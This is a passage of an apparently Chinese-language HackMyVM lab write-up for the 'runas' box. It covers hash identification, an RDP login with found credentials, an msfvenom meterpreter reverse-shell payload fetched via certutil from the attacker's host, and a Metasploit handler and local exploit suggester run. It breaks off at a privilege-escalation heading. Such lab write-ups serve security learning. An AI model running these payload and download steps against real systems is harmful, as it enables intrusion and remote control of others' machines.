\u5df2\u8bbf\u95ee: &quot;C:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/WindowsUpdate.log&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/win.ini&quot;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat results.log | grep runas  \nprocess as runas-PC\\Administrator in session 2\nprocess as runas-PC\\Administrator in session 2\nprocess as runas-PC\\Administrator in session 1\nprocess as runas-PC\\Administrator in session 1\n; MD5-runas-b3a805b2594befb6c846d718d1224557<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2a<code>md5<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ hash-identifier \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: b3a805b2594befb6c846d718d1224557\n\nPossible Hashs:\n[+] MD5\n[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))\n\nLeast Possible Hashs:\n[+] RAdmin v2.x\n[+] NTLM\n[+] MD4\n[+] MD2\n[+] MD5(HMAC)\n[+] MD4(HMAC)\n[+] MD2(HMAC)\n[+] MD5(HMAC(WordPress))\n[+] Haval-128\n[+] Haval-128(HMAC)\n[+] RipeMD-128\n[+] RipeMD-128(HMAC)\n[+] SNEFRU-128\n[+] SNEFRU-128(HMAC)\n[+] Tiger-128\n[+] Tiger-128(HMAC)\n[+] md5($pass.$salt)\n[+] md5($salt.$pass)\n[+] md5($salt.$pass.$salt)\n[+] md5($salt.$pass.$username)\n[+] md5($salt.md5($pass))\n[+] md5($salt.md5($pass))\n[+] md5($salt.md5($pass.$salt))\n[+] md5($salt.md5($pass.$salt))\n[+] md5($salt.md5($salt.$pass))\n[+] md5($salt.md5(md5($pass).$salt))\n[+] md5($username.0.$pass)\n[+] md5($username.LF.$pass)\n[+] md5($username.md5($pass).$salt)\n[+] md5(md5($pass))\n[+] md5(md5($pass).$salt)\n[+] md5(md5($pass).md5($salt))\n[+] md5(md5($salt).$pass)\n[+] md5(md5($salt).md5($pass))\n[+] md5(md5($username.$pass).$salt)\n[+] md5(md5(md5($pass)))\n[+] md5(md5(md5(md5($pass))))\n[+] md5(md5(md5(md5(md5($pass)))))\n[+] md5(sha1($pass))\n[+] md5(sha1(md5($pass)))\n[+] md5(sha1(md5(sha1($pass))))\n[+] md5(strtoupper(md5($pass)))\n--------------------------------------------------<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041327.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041327.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094334372\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u8fdc\u7a0b\u767b\u5f55<\/h3>\n<p>\u5f97\u5230\u51ed\u8bc1\uff1a<code>runas:yakuzza<\/code>\u3002\u5c1d\u8bd5\u8fdb\u884cssh\u767b\u5f55\uff0c\u4f46\u662f\u53d1\u73b0\u6ca1\u5f00\u542f22\u7aef\u53e3\uff0c\u6240\u5e78\u76ee\u6807\u4e3b\u673a\u5f00\u542f\u4e86<code>3389<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>win+R<\/code>\u518d<code>mstsc<\/code>\u8fdb\u884c\u8fdc\u7a0b\u684c\u9762\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041328.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094826565\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041329.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041329.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094853918\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041330.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041330.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094954899\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\u767b\u5f55\u5230\u8fdc\u7a0b\u684c\u9762\uff0c\u5c1d\u8bd5\u5f39\u4e00\u4e2ashell\u56de\u6765\uff0c\u672c\u5730\u5148\u751f\u6210\u4e00\u4e2ashell\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ msfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.10.103 lport=4444 -f exe &gt; shell.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 354 bytes\nFinal size of exe file: 73802 bytes\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/runas...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/192.168.10.103:8888\nPress CTRL+C to quit<\/code><\/pre>\n<p>\u7136\u540e\u5728\u53e6\u4e00\u4e2a\u7a97\u53e3\u4e2d\u8bbe\u7f6e\u76d1\u542c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set payload windows\/meterpreter\/reverse_tcp\npayload =&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/handler) &gt; options\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST                      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Wildcard Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/handler) &gt; set lhost 192.168.10.103\nlhost =&gt; 192.168.10.103\nmsf6 exploit(multi\/handler) &gt; run\n[*] Started reverse TCP handler on 192.168.10.103:4444 <\/code><\/pre>\n<p>\u8fd9\u6b21\u5c31\u7528\u9ed8\u8ba4\u7684\u7aef\u53e3\u4e86\uff0c\u7136\u540e\u5728\u8fdc\u7a0b\u684c\u9762\u4f7f\u7528<code>cmd<\/code>\u8fdb\u884c\u4e0b\u8f7d\uff0c\u4f7f\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041331.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041331.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100012979\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6539\u4e3a\u82f1\u8bed\uff0c\u518d\u4e0b\u8f7d\uff1a<\/p>\n<pre><code class=\"language-bash\">certutil -urlcache -split -f http:\/\/192.168.10.103:8888\/shell.exe<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041332.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041332.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100252453\"  \/><\/div><\/p>\n<p>\u6210\u529f\u4e0b\u8f7d\uff0c\u672c\u5730\u4e5f\u80fd\u770b\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041333.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041333.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100325032\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u6fc0\u6d3b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041334.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041334.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100401605\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041335.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041335.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100443994\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">meterpreter &gt; shell\nProcess 2448 created.\nChannel 1 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Users\\runas&gt;whoami\nwhoami\nrunas-pc\\runas\n\nC:\\Users\\runas&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\runas dizini\n\n08.06.2025  05:02    &lt;DIR&gt;          .\n08.06.2025  05:02    &lt;DIR&gt;          ..\n06.10.2024  21:38    &lt;DIR&gt;          Contacts\n09.10.2024  18:24    &lt;DIR&gt;          Desktop\n06.10.2024  21:38    &lt;DIR&gt;          Documents\n06.10.2024  21:38    &lt;DIR&gt;          Downloads\n06.10.2024  21:38    &lt;DIR&gt;          Favorites\n06.10.2024  21:38    &lt;DIR&gt;          Links\n06.10.2024  21:38    &lt;DIR&gt;          Music\n06.10.2024  21:38    &lt;DIR&gt;          Pictures\n06.10.2024  21:38    &lt;DIR&gt;          Saved Games\n06.10.2024  21:38    &lt;DIR&gt;          Searches\n08.06.2025  05:02            73.802 shell.exe\n06.10.2024  21:38    &lt;DIR&gt;          Videos\n               1 Dosya           73.802 bayt\n              13 Dizin   21.675.307.008 bayt bo\ufffd\n\nC:\\Users\\runas&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\runas\\Desktop&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\runas\\Desktop dizini\n\n09.10.2024  18:24    &lt;DIR&gt;          .\n09.10.2024  18:24    &lt;DIR&gt;          ..\n08.10.2024  17:07                31 user.txt\n               1 Dosya               31 bayt\n               2 Dizin   21.675.307.008 bayt bo\ufffd\n\nC:\\Users\\runas\\Desktop&gt;type user.txt\ntype user.txt\nHMV{User_Flag_Was_A_Bit_Bitter}\nC:\\Users\\runas\\Desktop&gt;^Z\nBackground channel 1? [y\/N]  y\nmeterpreter &gt; getuid\nServer username: runas-PC\\runas\nmeterpreter &gt; route\n\nIPv4 network routes\n===================\n\n    Subnet           Netmask          Gateway         Metric  Interface\n    ------           -------          -------         ------  ---------\n    0.0.0.0          0.0.0.0          192.168.10.1    10      11\n    127.0.0.0        255.0.0.0        127.0.0.1       306     1\n    127.0.0.1        255.255.255.255  127.0.0.1       306     1\n    127.255.255.255  255.255.255.255  127.0.0.1       306     1\n    192.168.10.0     255.255.255.0    192.168.10.105  266     11\n    192.168.10.105   255.255.255.255  192.168.10.105  266     11\n    192.168.10.255   255.255.255.255  192.168.10.105  266     11\n    224.0.0.0        240.0.0.0        127.0.0.1       306     1\n    224.0.0.0        240.0.0.0        192.168.10.105  266     11\n    255.255.255.255  255.255.255.255  127.0.0.1       306     1\n    255.255.255.255  255.255.255.255  192.168.10.105  266     11\n\nIPv6 network routes\n===================\n\n    Subnet                                   Netmask                                  Gateway                    Metric  Interface\n    ------                                   -------                                  -------                    ------  ---------\n    ::                                       ffff:ffff::                              fe80::4e10:d5ff:fe0a:f900  266     11\n    ::1                                      ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     1\n    fd00:4c10:d50a:f900::                    ffff:ffff:ffff:ffff:ffff:ffff::          ::                         18      11\n    fd00:4c10:d50a:f900::1002                ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    fd00:4c10:d50a:f900:65b5:ae9f:d9e6:7e7a  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    fd00:4c10:d50a:f900:e4d0:6fc2:8968:4806  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    fe80::                                   ffff:ffff:ffff:ffff:ffff:ffff::          ::                         266     11\n    fe80::5efe:c0a8:a69                      ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     12\n    fe80::65b5:ae9f:d9e6:7e7a                ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    ff00::                                   ff00::                                   ::                         266     1\n    ff00::                                   ff00::                                   ::                         266     11\nmeterpreter &gt; systeminfo\n[-] Unknown command: systeminfo. Did you mean sysinfo? Run the help command for more details.\nmeterpreter &gt; sysinfo\nComputer        : RUNAS-PC\nOS              : Windows 7 (6.1 Build 7601, Service Pack 1).\nArchitecture    : x64\nSystem Language : tr_TR\nDomain          : WORKGROUP\nLogged On Users : 1\nMeterpreter     : x86\/windows\nmeterpreter &gt; pwd\nC:\\Users\\runas\nmeterpreter &gt; background\n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) &gt; use post\/multi\/recon\/local_exploit_suggester\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; options\n\nModule options (post\/multi\/recon\/local_exploit_suggester):\n\n   Name             Current Setting  Required  Description\n   ----             ---------------  --------  -----------\n   SESSION                           yes       The session to run this module on\n   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits\n\nView the full module info with the info, or info -d command.\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; sessions -l\n\nActive sessions\n===============\n\n  Id  Name  Type                     Information                Connection\n  --  ----  ----                     -----------                ----------\n  1         meterpreter x86\/windows  runas-PC\\runas @ RUNAS-PC  192.168.10.103:4444 -&gt; 192.168.10.105:49161 (192.168.10.105)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; set session 1\nsession =&gt; 1\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; run\n[*] 192.168.10.105 - Collecting local exploits for x86\/windows...\n\/usr\/share\/metasploit-framework\/vendor\/bundle\/ruby\/3.3.0\/gems\/logging-2.4.0\/lib\/logging.rb:10: warning: \/usr\/lib\/x86_64-linux-gnu\/ruby\/3.3.0\/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.\nYou can add syslog to your Gemfile or gemspec to silence this warning.\nAlso please contact the author of logging-2.4.0 to request adding syslog into its gemspec.\n[*] 192.168.10.105 - 203 exploit checks are being tried...\n[+] 192.168.10.105 - exploit\/windows\/local\/bypassuac_comhijack: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.105 - exploit\/windows\/local\/ms10_092_schelevator: The service is running, but could not be validated.\n[+] 192.168.10.105 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/ntusermndragover: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/tokenmagic: The target appears to be vulnerable.\n[*] Running check method for exploit 42 \/ 42\n[*] 192.168.10.105 - Valid modules for session 1:\n============================\n\n #   Name                                                           Potentially Vulnerable?  Check Result\n -   ----                                                           -----------------------  ------------\n 1   exploit\/windows\/local\/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.\n 2   exploit\/windows\/local\/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.\n 3   exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 4   exploit\/windows\/local\/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.\n 5   exploit\/windows\/local\/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.\n 6   exploit\/windows\/local\/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.\n 7   exploit\/windows\/local\/ntusermndragover                         Yes                      The target appears to be vulnerable.\n 8   exploit\/windows\/local\/tokenmagic                               Yes                      The target appears to be vulnerable.\n 9   exploit\/windows\/local\/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.\n 10  exploit\/windows\/local\/agnitum_outpost_acs                      No                       The target is not exploitable.\n 11  exploit\/windows\/local\/always_install_elevated                  No                       The target is not exploitable.\n 12  exploit\/windows\/local\/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system\n 13  exploit\/windows\/local\/bits_ntlm_token_impersonation            No                       The target is not exploitable.\n 14  exploit\/windows\/local\/bthpan                                   No                       The target is not exploitable.\n 15  exploit\/windows\/local\/bypassuac_fodhelper                      No                       The target is not exploitable.\n 16  exploit\/windows\/local\/bypassuac_sluihijack                     No                       The target is not exploitable.\n 17  exploit\/windows\/local\/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found\n 18  exploit\/windows\/local\/cve_2020_1048_printerdemon               No                       The target is not exploitable.\n 19  exploit\/windows\/local\/cve_2020_1337_printerdemon               No                       The target is not exploitable.\n 20  exploit\/windows\/local\/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found\n 21  exploit\/windows\/local\/ikeext_service                           No                       The check raised an exception.\n 22  exploit\/windows\/local\/ipass_launch_app                         No                       The check raised an exception.\n 23  exploit\/windows\/local\/lenovo_systemupdate                      No                       The check raised an exception.\n 24  exploit\/windows\/local\/lexmark_driver_privesc                   No                       The check raised an exception.\n 25  exploit\/windows\/local\/mqac_write                               No                       The target is not exploitable.\n 26  exploit\/windows\/local\/ms10_015_kitrap0d                        No                       The target is not exploitable.\n 27  exploit\/windows\/local\/ms13_053_schlamperei                     No                       The target is not exploitable.\n 28  exploit\/windows\/local\/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.\n 29  exploit\/windows\/local\/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.\n 30  exploit\/windows\/local\/ms15_004_tswbproxy                       No                       The target is not exploitable.\n 31  exploit\/windows\/local\/ms16_016_webdav                          No                       The target is not exploitable.\n 32  exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.\n 33  exploit\/windows\/local\/ms16_075_reflection                      No                       The target is not exploitable.\n 34  exploit\/windows\/local\/ms16_075_reflection_juicy                No                       The target is not exploitable.\n 35  exploit\/windows\/local\/ms_ndproxy                               No                       The target is not exploitable.\n 36  exploit\/windows\/local\/novell_client_nicm                       No                       The target is not exploitable.\n 37  exploit\/windows\/local\/ntapphelpcachecontrol                    No                       The check raised an exception.\n 38  exploit\/windows\/local\/panda_psevents                           No                       The target is not exploitable.\n 39  exploit\/windows\/local\/ppr_flatten_rec                          No                       The target is not exploitable.\n 40  exploit\/windows\/local\/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found\n 41  exploit\/windows\/local\/virtual_box_guest_additions              No                       The target is not exploitable.\n 42  exploit\/windows\/local\/webexec                                  No                       The check raised an exception.\n\n[*] Post module execution completed<\/code><\/pre>\n<h3>runas\u53cd\u5f39rootshell<\/h3>\n<p>\u7136\u540e\u5c31\u5f00\u59cb\u4e86\u6f2b\u957f\u7684\u7ffb\u4fe1\u606f\u9636\u6bb5\u3002\u3002\u3002\u3002\u76f4\u5230\u65e0\u610f\u4e2d\u7ffb\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041336.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041336.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608102624799\" style=\"zoom:50%;\" 